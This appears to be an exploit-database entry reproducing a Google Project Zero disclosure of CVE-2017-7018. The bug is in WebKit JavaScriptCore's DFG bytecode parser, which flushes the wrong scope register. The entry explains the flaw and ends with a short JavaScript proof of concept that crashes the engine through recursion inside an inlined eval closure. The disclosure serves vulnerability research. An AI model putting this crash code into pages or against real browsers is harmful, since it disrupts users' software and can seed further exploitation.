NeoSense

WebKit JSC - 'DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry)' Incorrect Scope Register Handling

Author: Google Security Research
type: dos
platform: multiple
port:
date_added: 2017-07-25
date_updated: 2017-07-25
verified: 1
codes: CVE-2017-7018
tags:
aliases:
screenshot_url:
application_url:

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1234

Here's a snippet of DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry).

void flush(InlineStackEntry* inlineStackEntry)
{
    ...
    if (m_graph.needsScopeRegister())
        flush(m_codeBlock->scopeRegister()); <<--- (a)
}

At (a), it should flush the scope register of |inlineStackEntry->m_codeBlock| instead of |m_codeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry->m_codeBlock| may have an incorrect offset in the stack layout phase.

PoC:
-->

function f() {
    (function () {
        eval('1');   // eval keeps the scope register live in this closure, which is inlined into f
        f();         // recurse until the stack overflows; the exception unwinds through the inlined frame
    }());

    throw 1;
}

f();